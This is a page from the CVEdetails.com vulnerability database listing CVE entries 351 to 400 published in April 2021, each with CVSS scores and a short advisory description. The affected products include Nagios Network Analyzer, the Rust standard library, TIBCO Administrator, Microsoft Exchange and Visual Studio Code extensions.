CVEdetails.com the ultimate security vulnerability data source
(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)
Log In   Register
  What's the CVSS score of your company?
Vulnerability Feeds & WidgetsNew   www.itsecdb.com  

Security Vulnerabilities Published In April 2021

Press ESC to close
# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
351 CVE-2021-28925 89 Sql 2021-04-08 2021-04-13
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in Nagios Network Analyzer before 2.4.3 via the o[col] parameter to api/checks/read/.
352 CVE-2021-28924 79 XSS 2021-04-08 2021-04-12
4.3
None Remote Medium Not required None Partial None
Self Authenticated XSS in Nagios Network Analyzer before 2.4.2 via the nagiosna/groups/queries page.
353 CVE-2021-28918 20 Bypass 2021-04-01 2021-12-30
6.4
None Remote Low Not required Partial Partial None
Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
354 CVE-2021-28899 2021-04-29 2021-05-11
5.0
None Remote Low Not required None None Partial
Vulnerability in the AC3AudioFileServerMediaSubsession, ADTSAudioFileServerMediaSubsession, and AMRAudioFileServerMediaSubsessionLive OnDemandServerMediaSubsession subclasses in Networks LIVE555 Streaming Media before 2021.3.16.
355 CVE-2021-28879 190 Overflow 2021-04-11 2021-04-27
7.5
None Remote Low Not required Partial Partial Partial
In the standard library in Rust before 1.52.0, the Zip implementation can report an incorrect size due to an integer overflow. This bug can lead to a buffer overflow when a consumed Zip iterator is used again.
356 CVE-2021-28878 119 Overflow 2021-04-11 2021-04-27
4.3
None Remote Medium Not required None None Partial
In the standard library in Rust before 1.52.0, the Zip implementation calls __iterator_get_unchecked() more than once for the same index (under certain conditions) when next_back() and next() are used together. This bug could lead to a memory safety violation due to an unmet safety requirement for the TrustedRandomAccess trait.
357 CVE-2021-28877 119 Overflow 2021-04-11 2021-04-22
5.0
None Remote Low Not required None None Partial
In the standard library in Rust before 1.51.0, the Zip implementation calls __iterator_get_unchecked() for the same index more than once when nested. This bug can lead to a memory safety violation due to an unmet safety requirement for the TrustedRandomAccess trait.
358 CVE-2021-28876 119 Overflow 2021-04-11 2021-06-24
4.3
None Remote Medium Not required None Partial None
In the standard library in Rust before 1.52.0, the Zip implementation has a panic safety issue. It calls __iterator_get_unchecked() more than once for the same index when the underlying iterator panics (in certain conditions). This bug could lead to a memory safety violation due to an unmet safety requirement for the TrustedRandomAccess trait.
359 CVE-2021-28875 252 Overflow 2021-04-11 2021-04-22
5.0
None Remote Low Not required None None Partial
In the standard library in Rust before 1.50.0, read_to_end() does not validate the return value from Read in an unsafe context. This bug could lead to a buffer overflow.
360 CVE-2021-28874 120 Overflow 2021-04-06 2021-04-09
6.8
None Remote Medium Not required Partial Partial Partial
SerenityOS fixed as of c9f25bca048443e317f1994ba9b106f2386688c3 contains a buffer overflow vulnerability in LibTextCode through opening a crafted file.
361 CVE-2021-28856 369 2021-04-14 2021-04-21
4.3
None Remote Medium Not required None None Partial
In Deark before v1.5.8, a specially crafted input file can cause a division by zero in (src/fmtutil.c) because of the value of pixelsize.
362 CVE-2021-28855 476 2021-04-14 2021-04-19
4.3
None Remote Medium Not required None None Partial
In Deark before 1.5.8, a specially crafted input file can cause a NULL pointer dereference in the dbuf_write function (src/deark-dbuf.c).
363 CVE-2021-28832 Exec Code 2021-04-05 2021-04-08
6.8
None Remote Medium Not required Partial Partial Partial
VSCodeVim before 1.19.0 allows attackers to execute arbitrary code via a crafted workspace configuration.
364 CVE-2021-28829 74 2021-04-20 2021-04-23
6.0
None Remote Medium ??? Partial Partial Partial
The Administration GUI component of TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition for z/Linux, and TIBCO Administrator - Enterprise Edition for z/Linux contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute a persistent CSV injection attack from the affected system. A successful attack using this vulnerability requires human interaction from a person other than the attacker. Affected releases are TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.10.2 and below, and TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.11.0 and 5.11.1.
365 CVE-2021-28828 89 Sql 2021-04-20 2021-04-23
6.5
None Remote Low ??? Partial Partial Partial
The Administration GUI component of TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition for z/Linux, and TIBCO Administrator - Enterprise Edition for z/Linux contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute a SQL injection attack on the affected system. Affected releases are TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.10.2 and below, and TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.11.0 and 5.11.1.
366 CVE-2021-28827 79 XSS 2021-04-20 2021-04-27
6.8
None Remote Medium Not required Partial Partial Partial
The Administration GUI component of TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition for z/Linux, TIBCO Administrator - Enterprise Edition for z/Linux, TIBCO Runtime Agent, TIBCO Runtime Agent, TIBCO Runtime Agent for z/Linux, and TIBCO Runtime Agent for z/Linux contains an easily exploitable vulnerability that allows an unauthenticated attacker to social engineer a legitimate user with network access to execute a Stored XSS attack targeting the affected system. A successful attack using this vulnerability requires human interaction from a person other than the attacker. Affected releases are TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.11.0 and 5.11.1, TIBCO Runtime Agent: versions 5.10.2 and below, TIBCO Runtime Agent: versions 5.11.0 and 5.11.1, TIBCO Runtime Agent for z/Linux: versions 5.10.2 and below, and TIBCO Runtime Agent for z/Linux: versions 5.11.0 and 5.11.1.
367 CVE-2021-28826 863 2021-04-14 2021-04-22
7.2
None Local Low Not required Complete Complete Complete
The Windows Installation component of TIBCO Software Inc.'s TIBCO Messaging - Eclipse Mosquitto Distribution - Bridge - Community Edition and TIBCO Messaging - Eclipse Mosquitto Distribution - Bridge - Enterprise Edition contains a vulnerability that theoretically allows a low privileged attacker with local access on some versions of the Windows operating system to insert malicious software. The affected component can be abused to execute the malicious software inserted by the attacker with the elevated privileges of the component. This vulnerability results from a lack of access restrictions on certain files and/or folders in the installation. Affected releases are TIBCO Software Inc.'s TIBCO Messaging - Eclipse Mosquitto Distribution - Bridge - Community Edition: versions 1.3.0 and below and TIBCO Messaging - Eclipse Mosquitto Distribution - Bridge - Enterprise Edition: versions 1.3.0 and below.
368 CVE-2021-28825 863 2021-04-14 2021-04-22
7.2
None Local Low Not required Complete Complete Complete
The Windows Installation component of TIBCO Software Inc.'s TIBCO Messaging - Eclipse Mosquitto Distribution - Core - Community Edition and TIBCO Messaging - Eclipse Mosquitto Distribution - Core - Enterprise Edition contains a vulnerability that theoretically allows a low privileged attacker with local access on some versions of the Windows operating system to insert malicious software. The affected component can be abused to execute the malicious software inserted by the attacker with the elevated privileges of the component. This vulnerability results from a lack of access restrictions on certain files and/or folders in the installation. Affected releases are TIBCO Software Inc.'s TIBCO Messaging - Eclipse Mosquitto Distribution - Core - Community Edition: versions 1.3.0 and below and TIBCO Messaging - Eclipse Mosquitto Distribution - Core - Enterprise Edition: versions 1.3.0 and below.
369 CVE-2021-28797 787 Exec Code Overflow 2021-04-14 2021-04-21
7.5
None Remote Low Not required Partial Partial Partial
A stack-based buffer overflow vulnerability has been reported to affect QNAP NAS devices running Surveillance Station. If exploited, this vulnerability allows attackers to execute arbitrary code. QNAP have already fixed this vulnerability in the following versions: Surveillance Station 5.1.5.4.3 (and later) for ARM CPU NAS (64bit OS) and x86 CPU NAS (64bit OS) Surveillance Station 5.1.5.3.3 (and later) for ARM CPU NAS (32bit OS) and x86 CPU NAS (32bit OS)
370 CVE-2021-28793 863 Exec Code 2021-04-20 2021-04-23
7.5
None Remote Low Not required Partial Partial Partial
vscode-restructuredtext before 146.0.0 contains an incorrect access control vulnerability, where a crafted project folder could execute arbitrary binaries via crafted workspace configuration.
371 CVE-2021-28688 665 2021-04-06 2021-06-23
2.1
None Local Low Not required None None Partial
The fix for XSA-365 includes initialization of pointers such that subsequent cleanup code wouldn't use uninitialized or stale values. This initialization went too far and may under certain conditions also overwrite pointers which are in need of cleaning up. The lack of cleanup would result in leaking persistent grants. The leak in turn would prevent fully cleaning up after a respective guest has died, leaving around zombie domains. All Linux versions having the fix for XSA-365 applied are vulnerable. XSA-365 was classified to affect versions back to at least 3.11.
372 CVE-2021-28686 787 DoS Overflow 2021-04-08 2021-04-16
2.1
None Local Low Not required None None Partial
AsIO2_64.sys and AsIO2_32.sys in ASUS GPUTweak II before 2.3.0.3 allow low-privileged users to trigger a stack-based buffer overflow. This could enable low-privileged users to achieve Denial of Service via a DeviceIoControl.
373 CVE-2021-28685 269 2021-04-08 2021-04-20
7.2
None Local Low Not required Complete Complete Complete
AsIO2_64.sys and AsIO2_32.sys in ASUS GPUTweak II before 2.3.0.3 allow low-privileged users to interact directly with physical memory (by calling one of several driver routines that map physical memory into the virtual address space of the calling process) and to interact with MSR registers. This could enable low-privileged users to achieve NT AUTHORITY\SYSTEM privileges via a DeviceIoControl.
374 CVE-2021-28658 22 Dir. Trav. 2021-04-06 2021-06-04
5.0
None Remote Low Not required Partial None None
In Django 2.2 before 2.2.20, 3.0 before 3.0.14, and 3.1 before 3.1.8, MultiPartParser allowed directory traversal via uploaded files with suitably crafted file names. Built-in upload handlers were not affected by this vulnerability.
375 CVE-2021-28648 269 Exec Code 2021-04-22 2021-04-29
4.6
None Local Low Not required Partial Partial Partial
Trend Micro Antivirus for Mac 2020 v10.5 and 2021 v11 (Consumer) is vulnerable to an improper access control privilege escalation vulnerability that could allow an attacker to establish a connection that could lead to full local privilege escalation within the application. Please note that an attacker must first obtain the ability to execute low-privileged code on the target system to exploit this vulnerability.
376 CVE-2021-28647 427 2021-04-13 2021-04-14
4.4
None Local Medium Not required Partial Partial Partial
Trend Micro Password Manager version 5 (Consumer) is vulnerable to a DLL Hijacking vulnerability which could allow an attacker to inject a malicious DLL file during the installation progress and could execute a malicious program each time a user installs a program.
377 CVE-2021-28646 732 2021-04-13 2021-04-14
2.1
None Local Low Not required None Partial None
An insecure file permissions vulnerability in Trend Micro Apex One, Apex One as a Service and OfficeScan XG SP1 could allow a local attacker to take control of a specific log file on affected installations.
378 CVE-2021-28645 732 Exec Code 2021-04-13 2021-04-14
7.2
None Local Low Not required Complete Complete Complete
An incorrect permission assignment vulnerability in Trend Micro Apex One, Apex One as a Service and OfficeScan XG SP1 could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
379 CVE-2021-28549 120 Exec Code Overflow 2021-04-15 2021-09-08
6.8
None Remote Medium Not required Partial Partial Partial
Adobe Photoshop versions 21.2.6 (and earlier) and 22.3 (and earlier) are affected by a Buffer Overflow vulnerability when parsing a specially crafted JSX file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
380 CVE-2021-28548 120 Exec Code Overflow 2021-04-15 2021-09-08
6.8
None Remote Medium Not required Partial Partial Partial
Adobe Photoshop versions 21.2.6 (and earlier) and 22.3 (and earlier) are affected by a Buffer Overflow vulnerability when parsing a specially crafted JSX file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
381 CVE-2021-28546 353 2021-04-01 2021-09-14
4.3
None Remote Medium Not required None Partial None
Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are missing support for an integrity check. An unauthenticated attacker could leverage this vulnerability to modify content in a certified PDF without invalidating the certification. Exploitation of this issue requires user interaction in that a victim must open the tampered file.
382 CVE-2021-28545 353 2021-04-01 2021-09-08
5.8
None Remote Medium Not required Partial Partial None
Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are missing support for an integrity check. An unauthenticated attacker would have the ability to completely manipulate data in a certified PDF without invalidating the original certification. Exploitation of this issue requires user interaction in that a victim must open the tampered file.
383 CVE-2021-28492 2021-04-20 2021-05-04
4.0
None Remote Low ??? Partial None None
Unisys Stealth (core) 5.x before 5.0.048.0, 5.1.x before 5.1.017.0, and 6.x before 6.0.037.0 stores passwords in a recoverable format.
384 CVE-2021-28484 835 2021-04-14 2021-06-04
5.0
None Remote Low Not required None None Partial
An issue was discovered in the /api/connector endpoint handler in Yubico yubihsm-connector before 3.0.1 (in YubiHSM SDK before 2021.04). The handler did not validate the length of the request, which can lead to a state where yubihsm-connector becomes stuck in a loop waiting for the YubiHSM to send it data, preventing any further operations until the yubihsm-connector is restarted. An attacker can send 0, 1, or 2 bytes to trigger this.
385 CVE-2021-28483 Exec Code 2021-04-13 2021-04-14
7.7
None Local Network Low ??? Complete Complete Complete
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28482.
386 CVE-2021-28482 Exec Code 2021-04-13 2021-04-14
9.0
None Remote Low ??? Complete Complete Complete
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28483.
387 CVE-2021-28481 Exec Code 2021-04-13 2021-04-14
10.0
None Remote Low Not required Complete Complete Complete
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28482, CVE-2021-28483.
388 CVE-2021-28480 Exec Code 2021-04-13 2021-04-14
10.0
None Remote Low Not required Complete Complete Complete
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28481, CVE-2021-28482, CVE-2021-28483.
389 CVE-2021-28477 Exec Code 2021-04-13 2021-04-16
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28457, CVE-2021-28469, CVE-2021-28473, CVE-2021-28475.
390 CVE-2021-28475 Exec Code 2021-04-13 2021-04-16
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28457, CVE-2021-28469, CVE-2021-28473, CVE-2021-28477.
391 CVE-2021-28473 Exec Code 2021-04-13 2021-04-16
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28457, CVE-2021-28469, CVE-2021-28475, CVE-2021-28477.
392 CVE-2021-28472 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code Maven for Java Extension Remote Code Execution Vulnerability
393 CVE-2021-28471 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability
394 CVE-2021-28470 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code GitHub Pull Requests and Issues Extension Remote Code Execution Vulnerability
395 CVE-2021-28469 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28457, CVE-2021-28473, CVE-2021-28475, CVE-2021-28477.
396 CVE-2021-28468 843 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28466.
397 CVE-2021-28466 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28468.
398 CVE-2021-28464 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
VP9 Video Extensions Remote Code Execution Vulnerability
399 CVE-2021-28460 Exec Code 2021-04-13 2021-04-20
4.6
None Local Low Not required Partial Partial Partial
Azure Sphere Unsigned Code Execution Vulnerability
400 CVE-2021-28459 79 XSS 2021-04-13 2021-04-20
4.3
None Remote Medium Not required None Partial None
Azure DevOps Server Spoofing Vulnerability
Total number of vulnerabilities : 1821   Page : 1 2 3 4 5 6 7 8 (This Page)9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.